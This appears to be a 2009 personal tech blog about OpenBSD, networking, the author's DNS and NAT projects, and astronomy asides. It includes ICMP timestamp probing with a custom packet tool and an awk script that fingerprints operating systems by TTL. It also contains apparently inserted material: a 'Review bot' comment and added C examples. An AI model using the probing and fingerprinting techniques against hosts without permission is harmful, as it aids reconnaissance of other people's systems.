4.5-current install movie

May 7th, 2009

I have made a movie with the newest snapshot of OpenBSD. If you've installed OpenBSD before you'll notice some changes in this installer. I don't always go with the defaults but do a custom install (the partitions).

I tried watching the .avi with windows xp and it didn't work, but it works with mplayer available on linux and openbsd.

I read up on this and there is a driver for windows which is found here right near the bottom (2nd last).

OK the windows installer works when installed as administrator on an XP box. I'm sure it will work on Vista as well. If you've never seen the install of OpenBSD before perhaps this is worth watching.


Random Hackepedia

May 7th, 2009

Ports are identifiers of protocols that work on the transport layer (layer 4) of the OSI model. TCP and UDP are transport layer protocols that have ports. In TCP and UDP a port is represented by a 16 bit unsigned integer. Thus, the possible port range is 0 through 65535. Port 0 is illegal and no service resides on it.

Read more about Ports at Hackepedia.


Astronomy question: Spaceship Sun

May 11th, 2009

I'm looking for this information online but I can't find it. We orbit the sun and each quarter orbit we call seasons such as, spring, summer, autumn and winter. The sun also moves into some direction around the galactic center, and I'm wondering into which season does it currently move? How can this be proven? I live in the northern hemisphere so I go by northern directions.

PS: Some progress. We are heading towards the star Vega in the constellation Lyra.

PPS: The direction we are moving is also called the solar apex.


4.5-current install movie #2

May 15th, 2009

I made another movie with vmware. This time it's an install with the latest OpenBSD snapshot. If you saw the movie below this is the same but it's sped up and you'll have to press pause to follow what I did. I tested 2 things. One was whether adding a user was allowed as digits..as you'll see (it did allow digits the last snapshot before that), and the other was escaping out of the installer and checking whether another host was up.

There was one pleasant surprise in that there was a SHA256 checksum on downloaded packages and it reported it being false (as I used the packages from the previous snap on the local ftp site).


Random Hackepedia

May 15th, 2009

A process covers the entire address space for the size of a pointer (32 bit in 32 bit architectures, 64 bit for 64 bit architectures). Since virtual memory is being used, not all areas of a process have real memory assigned to it, only some parts...

To read more about stack on hackepedia click here.


Lots of installer movies

May 18th, 2009

Here are some installs that I have done in vmware and made a movie of it. I personally like the installers best in the order openbsd, netbsd, freebsd. I like OpenBSD because you can go back easily which I show in the fourth movie with install tricks.

Make sure you mirror it if you want to share it around. Also if you run windows remember there are codecs found here.


ICMP Timestamp

May 21st, 2009

Today someone mentioned ICMP timestamps and how they should be firewalled. So I did a bit of research on this. I had the source code handy on BSD and the timestamp returned is seconds since midnight and milliseconds from the microtime clock. The code for this looks something like this:

n_time
iptime(void)
{
        struct timeval atv;
        u_long t;

        microtime(&atv);
        /* milliseconds since midnight: seconds of the day * 1000 + ms part */
        t = (atv.tv_sec % (24*60*60)) * 1000 + atv.tv_usec / 1000;
        return (htonl(t));
}

Now all BSDs (Open, Net, Free) allowed ICMP timestamps by default, and OpenBSD had a sysctl where you can turn it off. Darwin had it turned off by default and tweakable by sysctl. I wrote a small module to my codeblue program and tested ICMP timestamps on Windows and Solaris and they don't seem to reply to it:

# ./cb  -s 172.16.0.3 -d 172.16.0.13 -I 13.0 -F timestamp -vv 
--> interface_gateway: looking up gateway mac for 172.16.0.13
--> interface_gateway: resolved to mac address 0.c.29.4b.46.1e
1 packet written at 60 bytes totalling 60 bytes

Now then, someone who wants insight on the time of day on some box can get a fairly accurate count which may help them with programs to attack a host. But this isn't guaranteed. In the old days, for example, TCP sequence numbers were based on the time of day and thus someone could make a good guess at what those sequence numbers are and be malicious. Today that's not possible anymore and someone even emphasized in OpenBSD that "Time is not a secret". That's true but, then again, if it's not a secret then why does OpenBSD's traceroute.c convolute the time in a trace packet? That's a nice idea but if time is not a secret it doesn't fit in the overall policy (just an observation). A good policy, that I like, is that time is nowhere used to seed random number generators, or cryptographic salts. If PRNGs (Pseudo Random Number Generators) are seeded with time and time is readable over the network accurately then that PRNG is no good.

I was sorta surprised that NetBSD and FreeBSD had no sysctl to turn this off and especially FreeBSD with its millions of sysctls didn't have a knob that turned ICMP timestamps off. I guess the best formula that may make someone feel better about this is just to firewall it locally. I'm tired now, good night.

PS: Oh yes I tested Linux (OpenSuse 10.3) as well and it also replies ICMP timestamps.
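
To show what a timestamp reply discloses, here is an added example (not code from this blog or from any BSD tree) that builds a reply the way a host answering with iptime() would and then parses it back into a time of day. The function names, the id/sequence values and the sample times are all made up for the illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ICMP_TSTAMPREPLY 14                      /* RFC 792 timestamp reply */
#define ICMP_TSTAMP_LEN  20                      /* 8-byte header + 3 timestamps */
#define MS_PER_DAY       (24UL * 60 * 60 * 1000)

struct tstamp_reply {
        uint16_t id, seq;
        uint32_t otime;         /* originate: requester's clock at send */
        uint32_t rtime;         /* receive: responder's clock at arrival */
        uint32_t ttime;         /* transmit: responder's clock at reply */
};

static uint32_t get32(const uint8_t *p)
{
        return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
            ((uint32_t)p[2] << 8) | p[3];
}

static void put32(uint8_t *p, uint32_t v)
{
        p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
        p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}

/* RFC 1071 Internet checksum; returns 0 when run over a valid message. */
uint16_t in_cksum(const uint8_t *p, size_t len)
{
        uint32_t sum = 0;
        size_t i;

        for (i = 0; i + 1 < len; i += 2)
                sum += ((uint32_t)p[i] << 8) | p[i + 1];
        if (len & 1)
                sum += (uint32_t)p[len - 1] << 8;
        while (sum >> 16)
                sum = (sum & 0xffff) + (sum >> 16);
        return (uint16_t)~sum;
}

/* Responder side: the message a host puts on the wire (constructed sample). */
void build_sample_reply(uint8_t *pkt, uint32_t otime, uint32_t now)
{
        uint16_t ck;

        memset(pkt, 0, ICMP_TSTAMP_LEN);
        pkt[0] = ICMP_TSTAMPREPLY;               /* type; code stays 0 */
        pkt[4] = 0x12; pkt[5] = 0x34;            /* id (constructed) */
        pkt[7] = 1;                              /* sequence (constructed) */
        put32(pkt + 8, otime);                   /* echoed from the request */
        put32(pkt + 12, now);                    /* receive timestamp */
        put32(pkt + 16, now);                    /* transmit timestamp */
        ck = in_cksum(pkt, ICMP_TSTAMP_LEN);
        pkt[2] = (uint8_t)(ck >> 8); pkt[3] = (uint8_t)(ck & 0xff);
}

/* Returns 0 on success, -1 short, -2 not a timestamp reply, -3 bad checksum. */
int parse_tstamp_reply(const uint8_t *pkt, size_t len, struct tstamp_reply *out)
{
        if (len < ICMP_TSTAMP_LEN)
                return -1;
        if (pkt[0] != ICMP_TSTAMPREPLY || pkt[1] != 0)
                return -2;
        if (in_cksum(pkt, len) != 0)
                return -3;
        out->id = (uint16_t)(pkt[4] << 8 | pkt[5]);
        out->seq = (uint16_t)(pkt[6] << 8 | pkt[7]);
        out->otime = get32(pkt + 8);
        out->rtime = get32(pkt + 12);
        out->ttime = get32(pkt + 16);
        return 0;
}

/* Render ms since midnight UT as hh:mm:ss.mmm. RFC 792 lets a host set the
 * high-order bit to flag a non-standard value; those are rejected here. */
int format_tstamp(uint32_t t, char *buf, size_t buflen)
{
        if ((t & 0x80000000UL) || t >= MS_PER_DAY)
                return -1;
        snprintf(buf, buflen, "%02u:%02u:%02u.%03u", (unsigned)(t / 3600000),
            (unsigned)(t / 60000 % 60), (unsigned)(t / 1000 % 60),
            (unsigned)(t % 1000));
        return 0;
}

int main(void)
{
        uint8_t pkt[ICMP_TSTAMP_LEN];
        struct tstamp_reply r;
        char buf[16];

        build_sample_reply(pkt, 71408000, 71408123);   /* constructed times */
        if (parse_tstamp_reply(pkt, sizeof(pkt), &r) == 0 &&
            format_tstamp(r.rtime, buf, sizeof(buf)) == 0)
                printf("remote time of day (UT): %s\n", buf);
        return 0;
}
```

The reply carries the clock to the millisecond but not the date, which is why it only matters for software that derives secrets from the time of day.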


Random Hackepedia

May 22nd, 2009

A broadcast is likened to radio and is by definition one sender and multiple receivers. Ethernet can broadcast, IP can broadcast. Broadcasting is stateless, meaning you cannot use TCP with it. Most broadcasts are done with datagrams.

To read more about Broadcasting go here.


Bug fix

May 22nd, 2009

I've made a bugreport for OpenBSD's tcpdump.

At a later time I found out that another similar bug was in the print-icmp6.c code and did a fix for that as well:

--- print-icmp6.c-orig  Fri May 22 13:09:27 2009
+++ print-icmp6.c       Fri May 22 13:10:10 2009
@@ -125,6 +125,7 @@
                        TCHECK(oip->ip6_nxt);
                        hlen = sizeof(struct ip6_hdr);
                        ouh = (struct udphdr *)(((u_char *)oip) + hlen);
+                       TCHECK(ouh->uh_dport);
                        dport = ntohs(ouh->uh_dport);
                        switch (oip->ip6_nxt) {
                        case IPPROTO_TCP:
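
Review bot: The new TCHECK(ouh->uh_dport) sits before the switch on oip->ip6_nxt, so a truncated capture now bails out on the port read even when the next header is a protocol whose case never uses dport; moving the TCHECK and the ntohs() into the cases that actually print the port would keep the bounds check next to the only reads that need it. Separately, hlen is fixed at sizeof(struct ip6_hdr), so ouh points at the transport header only when no extension headers follow the quoted IPv6 header; a comment stating that assumption would help the next reader.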



Network Map

May 26th, 2009

As you can see this is my network at home all contained within one computer using vmware. The load on uranus (the vmware host) is a constant 20% with all these other vm's on. I created the map with xfig.


IPv6 chart

May 28th, 2009

I clicked a little around the ripe.net site and found this chart which is very cool so I copied it.

IPv6 Relative Network Sizes

/128   1 IPv6 address                 A network interface
/64    1 IPv6 subnet                  18,446,744,073,709,551,616 IPv6 addresses
/56    256 LAN segments               Popular prefix size for one subscriber site
/48    65,536 LAN segments            Popular prefix size for one subscriber site
/32    65,536 /48 subscriber sites    Minimum IPv6 allocation
/24    16,777,216 subscriber sites    256 times larger than the minimum IPv6 allocation

I got this information from this page. As I have a /48 at home I don't think I'll ever run out of IP space even if I gave each single cell in my body an IP address. BTW. a LAN segment in the chart is /64 which is also called an IPv6 subnet.


Random Hackepedia

May 29th, 2009

ldd as found on Linux or a BSD displays what dynamic dependencies to a dynamic program exist. Some may even tell of breakage of libraries that don't exist anymore.

To read more about ldd go here.


Natally

June 5th, 2009

Natally is a NAT/VPN program that works on a host that cannot do tun/tap. With iptables available, it'll make a packet socket and run with a raw socket. At the same time one can connect to it and have the session blowfish encrypted. So far there are some problems with performance that I'm working on. It's doggedly slow but I'm positive that it can be sped up.

Natally is now hosted at sourceforge. This is its homepage.

There exists a server written for Linux OpenSuse 10.3 and a client written for OpenBSD 4.5. In the future there may be other clients written for linux perhaps, but it's not a priority for me right now.

Update: Progress. I've replaced the ip and tcp checksumming routines and there now aren't any bad checksums, which really were part of the slowness as the implementation had to wait for retransmissions and hope the checksums were alright. Phew am I glad that was found.


Random Hackepedia

June 6th, 2009

tr stands for translate characters and that's what it does.

To read more about tr go here.


What's up

June 13th, 2009

Not much is up, I wrote a linux client for natally which seems to work. I improved the openbsd client for natally a bit so that routes can be set up which unfortunately doesn't work on the linux client. I'm going to skip putting up a random hackepedia since there is so little content this week.


Solstice not too far away

June 17th, 2009

In the northern hemisphere (Europe, North America, Asia) we'll have the Summer Solstice on the 21st of June, which means that on this day at high noon the sun is at its highest angle from the horizon. In the southern hemisphere (parts of South America, Australia, parts of Africa) the sun is at its lowest angle from the horizon (at high noon). The reason for this is the tilt of our earth. This tilt is responsible for our seasons (at least in the northern hemisphere).


HOME

June 19th, 2009

Yesterday I found this movie on youtube and it touched me. It basically warned humanity once again of our ways and said in 10 years the disruption of the harmony of life will be irreversible. The movie has some great footage from all over the world, check it out.


OpenSSL speed

June 21st, 2009

I participated in the Deschall (sp) crack challenge back in 97 or so and the DES cipher was broken by a supercomputer especially built for the task. So now it's 12 years later and a lot has happened. DES was replaced by AES, and AES is a lot more secure, the literature says.

But I'm left wondering why the dickens AES is a faster cipher than DES. Pretend you are brute forcing a cipher, wouldn't then a faster cipher produce more attempts per second than a slower cipher? This means a brute force would end sooner to exhaust a cryptogram. Hmm. Here are some stats of DES and AES that I cut from an "openssl speed" command on my home computer.

The 'numbers' are in 1000s of bytes per second processed.
type             16 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
des cbc          19981.67k    26454.32k    27109.93k    27133.40k    26813.16k
des ede3          9693.15k     9656.40k     9351.31k     9793.71k     9824.77k
blowfish cbc     35115.53k    41062.07k    39941.05k    41949.41k    41771.29k
aes-128 cbc      33001.89k    51473.35k    60324.97k    66089.46k    63121.28k
aes-192 cbc      30109.43k    46625.91k    51426.45k    54773.53k    56143.75k
aes-256 cbc      34359.02k    42632.24k    47491.13k    47512.66k    46742.06k
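
The question above can be worked through with the table's own numbers. This is an added example, not part of the original post; it uses the 8192-byte column, assumes one key trial costs one block operation (key setup is ignored) and that the search runs at this one machine's speed. The struct and function names are made up for the illustration.

```c
#include <stdio.h>
#include <string.h>

#define SECONDS_PER_YEAR (365.25 * 24 * 60 * 60)

struct cipher_speed {
        const char *name;
        int key_bits;           /* size of the key space is 2^key_bits */
        int block_bytes;        /* bytes handled per block operation */
        double kbytes_per_sec;  /* 8192-byte column of the table above */
};

/* Rows copied from the "openssl speed" output quoted in the post. */
static const struct cipher_speed speeds[] = {
        { "des cbc",      56,  8, 26813.16 },
        { "aes-128 cbc", 128, 16, 63121.28 },
        { "aes-192 cbc", 192, 16, 56143.75 },
        { "aes-256 cbc", 256, 16, 46742.06 },
};
#define NSPEEDS (sizeof(speeds) / sizeof(speeds[0]))

const struct cipher_speed *find_cipher(const char *name)
{
        size_t i;

        for (i = 0; i < NSPEEDS; i++)
                if (strcmp(speeds[i].name, name) == 0)
                        return &speeds[i];
        return NULL;
}

/* Block operations per second: throughput divided by the block size. */
double trials_per_sec(const struct cipher_speed *c)
{
        return c->kbytes_per_sec * 1000.0 / c->block_bytes;
}

/* 2^key_bits as a double (exact, powers of two need no rounding). */
double keyspace(int key_bits)
{
        double n = 1.0;

        while (key_bits-- > 0)
                n *= 2.0;
        return n;
}

/* Years to try every key at the measured rate. */
double years_to_exhaust(const struct cipher_speed *c)
{
        return keyspace(c->key_bits) / trials_per_sec(c) / SECONDS_PER_YEAR;
}

int main(void)
{
        size_t i;

        printf("%-12s %14s %14s\n", "cipher", "trials/sec", "years");
        for (i = 0; i < NSPEEDS; i++)
                printf("%-12s %14.0f %14.3g\n", speeds[i].name,
                    trials_per_sec(&speeds[i]), years_to_exhaust(&speeds[i]));
        return 0;
}
```

Per block, AES-128 comes out less than 20% faster than DES on this machine, while its key space is 2^72 times larger, so the size of the key dominates the speed of the cipher by a wide margin.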


Random Hackepedia

June 21st, 2009

A Fifo is a named pipe. It is used for IPC. It is created with the mkfifo syscall or command. Fifos reside in the filesystem and require a process to read from it while another process writes to it.

To read more about fifo, go to Hackepedia.

PS: Happy Solstice 6/2009!



Random Hackepedia

June 26th, 2009

If you want to use a sniffer to watch dhcp requests, replace rl0 with your NIC:

To read more about dhcpd read on.


Natally does AES

June 30th, 2009

Well I have been hacking away at natally the last couple weeks now and I finally got dual mode encryption into it. It now does AES as well as Blowfish encryption. Because of the nature of the code it should be easy now to add other ciphers too, it just needs to be put in place. I started out with blowfish and then coded my way to AES removing a lot of hard code such as blocksizes which need to be dynamic with multiple ciphers. I'm thinking perhaps I should write a manpage now (ughh) or something.

PS: with revision 50 I committed the NAT state expiration code which was needed to complete this project. Perhaps it'll need a bit of tweaking here and there but the main code is finished.


The xlog is discontinued

July 2nd, 2009

Some people must have gotten hold of an old cache of my blog from 2006/2007 where I offered blog articles in encrypted form. You could order a decrypt CD then to decrypt what was written, however no one at the time was interested. I discontinued offering the blog in encrypted form and no sales were made. I found some bounce mails from people today writing in to the decrypt mailbox (which doesn't exist anymore). Thanks for your interest but the offer is over.


OpenBSD packages

July 4th, 2009

First off, I'm not a fan of packages. But I'm wrong. The economics of pre-compiled packages are better than building a package yourself. For one you don't have to run your CPU hot building a port that someone has already done for you, so you're wasting less electricity if you install the package. However I'm the type of person that wants the source code at all times so I've found a way to compromise. I put this in my /etc/mk.conf:

# more /etc/mk.conf
FETCH_PACKAGES=Yes
PKG_PATH=ftp://ftp.de.openbsd.org/pub/OpenBSD/4.5/packages/i386/

So now all I have to do is go into the ports and type: make fetch (gets the source) and make install (gets the package and installs it). This way I have the source to fall back on when I need it and the package process is a few seconds at most.


Random Hackepedia

July 4th, 2009

All users on a system have the ability to customize their environment to their taste. This can involve choosing a shell such as bash, zsh, or tcsh, setting the environment, shell aliases, or running scripts at startup. These tasks are all handled by various "profile scripts".

To read more about profiles read on.


Random Hackepedia

July 11th, 2009

Syslog is the common way of managing logfiles on UNIX. Processes that wish to log something write to a UNIX socket usually bound in /dev/log which then goes to syslogd that writes these logs to a file usually found in /var/log.

To read more about syslog at hackepedia go here.


An intergalactic puzzle

July 12th, 2009

I read NASA's APOD (Astronomy Picture of the Day) and if you click on the link you'll see today's picture which is a message to aliens. I wanted to see just how easy it is so I started deciphering it. First it lists numbers in quantity represented as dots then it shows the binary value of the number and then a base 10 representation. These numbers go from 0 to 10 (with binary as well) and continue in base ten with 10, 11, 12, 14, 15 and 20. At the top then is a 1 on the left side and a 1 on the right side in binary, possibly indicating our sexes (with five spots possibly indicating our fingers on each hand). Then it continues with prime numbers from 2 through 89 (so that definitely something intelligent is behind this). And then it says 2 3021377 X1 which I cannot figure out, but perhaps you can.

Hah! Google knew it was a very high prime number called a Mersenne prime. Here is its homepage.


Removed link

July 13th, 2009

In a commit Theo de Raadt points out that OpenBSD does not link to sites filled with hatred. I am following suit by removing this link from the SolarScale blog. I don't exactly know what the offending message was but I have some idea of it.


Random Hackepedia

July 17th, 2009

Distributed Denial of Service (see DoS). A distributed denial of service is many computers on the Internet coordinating a Denial of Service attack (DoS) against a single host, network or network infrastructure....

To read more about DDos go here.


40 Years ago (Apollo)

July 22nd, 2009

The first man in orbit was Yuri Gagarin and that was in 1961. Eight years later we had the first man on the moon. That tells you that it's not all too hard to get to the moon considering 30 years of development since the V2 rocket that Wernher von Braun designed in world war 2. The Chinese have a space program and even put people into orbit before. Whether they can land a man on the moon in 8 years remains to be seen. But it's not impossible.



TCP Wrappers to protect ssh

July 23rd, 2009

In the last few days there was a rumour of an openssh exploit, and also a worm that would spread from openssh'ed computers. One thing I did was change the default port so that an automated worm going to port 22 would go nowhere. I also applied TCP wrappers to my hosts, I'll give you an example of a host I use only for IPv6.

$ more /etc/hosts.allow
sshd : [2001:a60:f074::]/48

$ more /etc/hosts.deny
sshd : ALL
$ 

The host in question was a FreeBSD host and they require those weird square brackets with the prefix behind. An OpenBSD host doesn't require these square brackets.

What the rules do is they allow my IPv6 subnet to connect via SSH and deny the rest.


The stolen bytes (part 2)

July 30th, 2009

I've switched my webserver to lighttpd. The license seemed right, the coding style seemed fair, a lighter httpd is all we need. I checked the problem with the chinese log fakers (I whoised the IP) and it doesn't happen. The logs now properly tell that they are only downloading about 46K bytes instead of 70 MB. If it were all so simple as this.

Update: more comes to light. I noticed that the downloads come at a certain frequency and get stopped mostly at 40K or so. It's possible that the chinese firewall is stopping my RFC's that I recorded which are in the public section of this website. I used a testing website from shanghai to test and there definitely is a time-out when trying to access my .mp3's. Here is the website and the picture I made follows (so you don't have to try it out wasting bytes):

Update 2: I was able to get a packet dump of one host trying to download the mp3's from me and it's apparent that the great firewall of China cuts it off. Here it is. You'll see at the end there are 10 RSTs, normally a host only does 1 RST to end a connection and that's it. I've heard about the firewall in China doing it exactly this way too. The clues just keep on coming in.


The stolen bytes

July 30th, 2009

According to my weblogs I was getting downloads from some IP addresses on the order of 80 GB a month. I found that hard to believe because my VPS provider's charges show that I only use about 50 MB a day when I'm not running natally.

To show you I have gathered the bytes from the "common" apache log for the highest downloader:

pjp@proteus:/usr/local/apache2/logs> zcat access_log.1.gz | grep Jul | \
grep 61.xxx.xxx.xx | awk '{ total += $NF } END { printf("total: %s\n", total);}'
total: 8432326849

So then I decided to do what he does, I make a HTTP 1.0 connection and download a large mp3, then I interrupt the download, and in the logs it says I have downloaded the entire file which is bogus:

212.xxx.xxx.xxx - - [30/Jul/2009:19:50:08 +0200] "GET /public/rfc1122nc.mp3 HTTP/1.0" 200 71848370
212.xxx.xxx.xxx - - [30/Jul/2009:19:51:59 +0200] "GET /public/rfc1122nc.mp3 HTTP/1.0" 200 71848370
212.xxx.xxx.xxx - - [30/Jul/2009:20:18:01 +0200] "GET /public/rfc1122nc.mp3 HTTP/1.0" 200 71848370

Every time I interrupted the download and every time it said I downloaded 71 MB. This adds up, and I'm thinking if I had a webhoster that charges the traffic from the apache log files then there is a big problem as people may get overcharged traffic wise. The best thing to do is to get traffic logged at the router (by means of access lists perhaps) and not the apache log files.

Another thing I did was make sure that there is no transparent proxy anywhere and so on the last download I packet dumped the session:

proteus:~ # tcpdump -v -n -r apache.out -l | wc -l
reading from file apache.out, link-type LINUX_SLL (Linux cooked)
167

167 packets were logged and at an MTU of 1500 it doesn't get near the 71MB of the file, so the session isn't cheating me by buffering in between.

The nicest thing would be to patch this in apache.


Random Hackepedia

August 7th, 2009

Hubs are devices that connect other devices together over a network. They are inherently a "broadcast" device, in that all devices see all traffic that passes through the hub, even if they are neither the sender nor receiver of the traffic....

To read more about Hubs go here.


Random Hackepedia

August 14th, 2009

X is the X Window System as designed by Project Athena at MIT. It is a graphical user environment that allows cursor movement over windows as displayed on the monitor...

To read more about this hackepedia entry go here.


Freak for Numbers?

August 14th, 2009

I'm a freak for numbers and I recently came across this website: www.ipspotting.com. It rates your IP number through a CGI. My host proteus.solarscale.de got a score of 35 which was half interesting for it, my other static IP got a score of 23 and that wasn't so interesting, even though it had a prime number in the dotted quad. Check it out sometime.


40 Years of UNIX

August 20th, 2009

This was in the BBC. Happy Anniversary UNIX!


Random Hackepedia

August 21st, 2009

Encryption is the art of obfuscating information so that a third party cannot read its contents...

Read on, here.


The IPv4 Address Report

August 22nd, 2009

I came across this webpage called the IPv4 Address report. It predicts when we will run out of IPv4 space. At the time of this writing it was 694 days and I noticed over a couple of weeks that this number can grow or shrink as the prediction passes over time.

Running out of IPv4 space is hardly the end of the world. It just means that IPv6 will be a must have rather than a nice-to-have. This blog already is mirrored on ipv6 space at ipv6.solarscale.de (you can only reach it if you have IPv6 configured).



It's donation time again

August 24th, 2009

A small amount goes to MARC mailing list archive for their superb archiving services, I use MARC regularly.


Random Hackepedia

August 28th, 2009

One major change I've noticed in Solaris 10 is that admintool is gone...

To read more about Solaris 10 go here


Wildcarddns feature

August 31st, 2009

I've improved the code on wildcarddnsd so that it grabs the incoming ttl and displays it in the logs. Eventually I want to make it so that the dns server closest to an IP will reply. This requires some coding with sockets between two or more wildcarddns servers and allowing it to get the TTL is just a small step. How long it'll be before done I don't know, don't get your hopes up too high on it, unless you want to do some work and contribute.


Random Hackepedia

September 5th, 2009

A system call is an API for a userland process to communicate with the kernel to request data or services outside of its protected memory...

To read more about system calls go to hackepedia.


Schneier's new crypto book

September 5th, 2009

Bruce Schneier announces a new book called "cryptography engineering" which is a sequel to "practical cryptography". I think I'm gonna buy this new book since I have another book of his called "applied cryptography" and it was a nice to have.


Identifying OS by TTL

September 7th, 2009

By default BSD and Linux systems have a TTL of 64. Windows systems have a default TTL of 128. Given that information one can with some certainty say what OS did a DNS lookup on a wildcarddns DNS server. It requires logging turned on and evaluating the log with AWK.

Here is a small shell script:

grep wild /var/log/all | grep ttl | grep -v "ttl=0" |
awk '{ split($14, a, "="); split(a[2], b, ")"); print b[1]; }' |
sort | uniq -c |
awk 'BEGIN { printf("DNS lookups per operating system\n"); }
{
        # $1 = count from uniq -c, $2 = TTL seen on the incoming query
        if ($2 > 64) {
                if ($2 > 128) hash["unknown"] += $1;
                else hash["windows"] += $1;
        } else
                hash["unix"] += $1;
}
END { for (i in hash) printf("%-10s - %s lookups\n", i, hash[i]); }'

The output looks somewhat like this:

DNS lookups per operating system
unknown    - 11 lookups
windows    - 90 lookups
unix       - 242 lookups

Unknown OS is anything over a TTL of 128 (probably with a default ttl of 255).

Here are some TTL's of default systems:

setebos$ uname -a
OpenBSD setebos.solarscale.de 4.5 GENERIC#0 i386
setebos$ sysctl -a | grep ttl 
net.inet.ip.ttl=64

# uname -a
SunOS sycorax 5.10 Generic_137138-09 i86pc i386 i86pc
# ndd /dev/ip ip_def_ttl
255
# ndd /dev/udp udp_ipv4_ttl
255

[pjp@uranus ~]$ uname -a
Linux uranus.centroid.eu 2.6.18-92.1.13.el5 #1 SMP  ... cut
[pjp@uranus ~]$ cat /proc/sys/net/ipv4/ip_default_ttl
64

So unknown can be changed to solaris.


Planet of the Users (OpenBSD song)

September 8th, 2009

Today the new OpenBSD song came out for OpenBSD 4.6. The song is inspired by the movie "Planet of the Apes", where in the future Puffy flies to our planet in a timemachine. As he lands he sees a world that is evil. People have their arms surgically removed at birth and have a screen before their eyes to see, probably to take them out of their misery. Personal robots do all tasks that arms would have done. Puffy gets caught after someone identifies him as a hacker, but then escapes after turning the warden fish's display off (who by the way sees him as a woman in a bikini).

The story reminds me of a brainstorm I had in my old apartment where people get their limbs removed in order to program for a slave driver. Can't run away if you got no legs.

Puffy says "stop this future", and I agree, we don't need limbless people that would otherwise have healthy limbs. Down with slavery!


Random Hackepedia

September 12th, 2009

A Firewall is part of an Operating System's networking stack that allows one to create policies for network traffic, and permit or deny that traffic accordingly...

To read more about firewalls, click on the link.


Equinox in a few days

September 17th, 2009

The last equinox of this year is in a few days, 5.



Random Hackepedia

September 19th, 2009

A process covers the entire address space for the size of a pointer (32 bit in 32 bit architectures, 64 bit for 64 bit architectures). Since virtual memory is being used, not all areas of a process have real memory assigned to them, only some parts (access to parts that have no memory results in a SIGSEGV signal and the process is killed)...

To read more about heap, click on link.


Happy Equinox

September 22nd, 2009

Today is the equinox. The sun sets at the North Pole and rises at the South Pole. Also night should be as long as day.


Nominum's statements

September 23rd, 2009

As some of you may know I'm the author of the Wildcard DNS server. I read the following words from Nominum: "Open Source DNS a Recipe for Problems". And I have to disagree with this somewhat. But when looking at my own meagre DNS server, there are a few areas of concern. First, my server wasn't meant to be put on the Internet when I first wrote it close to four years ago, but its functionality allowed it to be run as an authoritative nameserver. I have been serving the centroid.eu zone with it and continually studying the logs of it and I'm happy to report that my server was never killed from remote, I never had to restart the server. I'm surprised that it works out to be fairly stable.

Wildcard DNS was and is a research project and while I'm at it I'm sharing the source of it. Whoever wants to use it should know the license. The license (BSD license) protects me as the author of the program from being sued by someone who may get damaged by using this DNS server. There is some risk using this software, but I personally am pretty happy. Writing a DNS server isn't easy, but when you do you learn a lot. How the DNS protocol is utterly broken (by using 16 bit ID's), for example. Nominum can't get around the 16 bit ID problem, it's a protocol problem.

So anyhow, I'm in the process of adding new functionality to Wildcard DNS that no other open source nameserver has, and I'm looking forward in seeing it run and experiment with it. When it turns out to work pretty well the functionality can be put into other nameservers at their will.

If you ask me Nominum just wants a bigger chunk of the monopoly that BIND used to have and now are on a warpath to be the dominant dns server. Good for them, and good luck.


Random Hackepedia

September 26th, 2009

Hackepedia is down so I'm going to give you a link to BSS on my hackepedia backups.


Alphabetical Countup

September 28th, 2009

Someone on IRC needed a program that counts the alphabetical characters in words and adds their value. So the value of A would be 1, the value of B would be 2 and "AB" would be 3 (1 + 2). I wrote this program for him:

#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>

int
main(int argc, char *argv[])
{
        int i;
        char *p;

        if (argc != 2) {
                fprintf(stderr, "usage: name [name]\n");
                exit(1);
        }
        p = argv[1];
        i = 0;
        while (*p) {
                /* only letters count: a/A = 1 ... z/Z = 26 */
                if (isalpha((unsigned char)*p))
                        i += (tolower((unsigned char)*p) - 'a') + 1;
                p++;
        }
        printf("the number of name %s is %d\n", argv[1], i);
        exit(0);
}

With counting up names and words one can see which ones are similar in value. Here are some examples:

Peter J. Philipp - Bermuda T. Triangle
Peter - daemonic, Titan, Zion, Yahoo, angelical
pbug - Pete, hacker, airhead, Bobby
centroid - demihuman, demonlike
solarscale - equinox, bridgekeeper, clockroom

I made a file called num2words.txt on the public download that has 234,000 words or so sorted to their respective alphabetic countup. The processing time it took on my home computer was roughly 2 hours. Because I didn't make the program efficient it took this long.

Here is a super quick awk statement that makes creating the wordlist super fast:

awk 'BEGIN { for (i = 65; i < 91; ++i) { c = sprintf("%c", i);  h[c] = \
h[tolower(c)] =  i - 64 } } { tot = 0; for (i = 1; i <= length(); ++i) \
tot += h[substr($0, i, 1)]; print tot, $0 }' /usr/share/dict/words | \
sort -n

Thanks go to Figz for making this.


Compiling and debugging a program

October 6th, 2009

Occasionally I'll post a small C program on this blog. This is how you can compile it on a UNIX-based computer. Also I add the (-g) compile option which includes the symbols in the file to make debugging easier. I'm using this on the program sphere.c which is below, here goes:


setebos$ ls sphere.c
sphere.c
setebos$ cc -g -o sphere sphere.c
/tmp//ccnSRGuU.o(.text+0x66): In function `main':
/usr/home/pjp/src/math/sphere.c:18: undefined reference to `pow'
/tmp//ccnSRGuU.o(.text+0x93):/usr/home/pjp/src/math/sphere.c:19: undefined reference to `pow'
collect2: ld returned 1 exit status
setebos$ cc -g -o sphere sphere.c -lm
setebos$ gdb -silent ./sphere
(gdb) list
2       #include <stdlib.h>
3       #include <math.h>
4
5       int
6       main(int argc, char *argv[])
7       {
8               double volume, radius;
9               double area;
10
11              if (argc != 2) {
(gdb) just press enter here
12                      fprintf(stderr, "usage: ./sphere [radius]\n");
13                      exit(1);
14              }
15
16              radius = atof(argv[1]);
17
18              volume = (4 * M_PI * (pow(radius, 3))) / 3;
19              area = 4 * M_PI * (pow(radius, 2));
20
21              printf("Sphere with radius of %f\n", radius);
(gdb) break 17
Breakpoint 1 at 0x1c0007df: file sphere.c, line 17.
(gdb) run 10
Starting program: /usr/home/pjp/src/math/sphere 10

Breakpoint 1, main (argc=2, argv=0xcfbfb9bc) at sphere.c:18
18              volume = (4 * M_PI * (pow(radius, 3))) / 3;
(gdb) print radius
$1 = 10
(gdb) n
19              area = 4 * M_PI * (pow(radius, 2));
(gdb) print volume
$2 = 4188.7902047863909
(gdb) n
21              printf("Sphere with radius of %f\n", radius);
(gdb) print area
$3 = 1256.6370614359173
(gdb) continue
Continuing.
Sphere with radius of 10.000000
AREA   = 1256.64
VOLUME = 4188.79

Program exited normally.
